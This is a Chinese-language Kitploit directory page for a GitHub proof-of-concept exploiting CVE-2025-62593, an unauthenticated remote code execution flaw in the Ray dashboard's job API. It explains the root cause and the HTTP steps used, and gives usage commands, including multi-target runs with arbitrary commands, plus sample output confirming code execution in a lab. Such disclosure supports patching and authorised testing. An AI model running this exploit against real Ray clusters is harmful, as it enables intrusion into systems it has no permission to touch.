Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-62593-PoC — CVE-2025-62593 的 PoC:Ray 中未认证的 RCE(CISA KEV)。仅使用标准库的 Python。 | Kitploit
工具/GitHubGitHub/boreas37/cve-2025-62593-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试AI 安全
GitHubboreas37/cve-2025-62593-poc

CVE-2025-62593-PoC

CVE-2025-62593 的 PoC:Ray 中未认证的 RCE(CISA KEV)。仅使用标准库的 Python。

查看仓库
12天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-62593 — Ray 远程代码执行(未认证)

CVE-2025-62593 的概念验证(PoC),该漏洞是 Ray 分布式 AI 计算引擎中的一个未认证远程代码执行漏洞,可通过基于浏览器的 DNS 重绑定攻击加以利用。该漏洞已被列入 CISA 已知被利用漏洞(KEV)目录,并且正在被积极利用。

根本原因是 Ray 团队长期以来的设计决策:在 /api/jobs 和 /api/job_agent/jobs 等关键 HTTP 端点上不启用任何认证。因此,未认证的远程攻击者可以提交一个 Ray 任务(Ray Job),其入口点(entrypoint)为任意命令,该命令随后会在集群头节点上执行——实现完全的远程代码执行。

此 PoC 直接与 Ray Dashboard HTTP API 通信(无需浏览器/DNS 重绑定即可演示底层漏洞),并从任务日志中恢复命令输出。

影响

  • CVSS: 严重(9.8)
  • 受影响版本: Ray < 2.52.0(该公告已发布补丁)
  • CISA KEV: 是——已被积极利用,已强制执行修复截止日期
  • 使约 20 万+ 个可公开访问的 Ray AI 集群暴露于预认证 RCE 风险之下

功能

  1. POST /api/jobs/,使用一个 entrypoint 运行你的命令并将其 stdout/stderr 捕获到临时文件中,然后打印该文件内容。
  2. 轮询 GET /api/jobs/,直到任务达到终止状态。
  3. 读取 GET /api/jobs/<submission_id>/logs 并打印命令输出。

用法

root@kitploit:~
# 单个目标
python3 ray_rce_poc.py --target http://HOST:8265

# 自定义命令
python3 ray_rce_poc.py --target http://HOST:8265 --command "id; uname -a"

# 从文件读取多个目标(每行一个,'#' 为注释)
python3 ray_rce_poc.py --targets targets.txt --command id

# 写入 JSON 摘要
python3 ray_rce_poc.py --target http://HOST:8265 --output out.json

# 帮助
python3 ray_rce_poc.py --help

仅需 Python 3 标准库——无第三方依赖。

示例(已针对本地 Docker 实验环境验证)

root@kitploit:~
$ python3 ray_rce_poc.py --target http://localhost:8265 --command "id; hostname"
== http://localhost:8265
Running entrypoint for job raysubmit_XXX: python -c "import os,os.path; ..."
uid=1000(ray) gid=100(users) groups=100(users),27(sudo)
05cdb1bea437
=> PASS (RCE confirmed, status: SUCCEEDED, exit code: 0)

参考

  • CISA KEV 目录
  • GitHub 安全公告 GHSA-q279-jhrf-cc6v

免责声明

仅用于安全研究和授权测试。请仅对您拥有或已获得明确测试许可的系统使用。作者不对滥用行为负责。

下载工具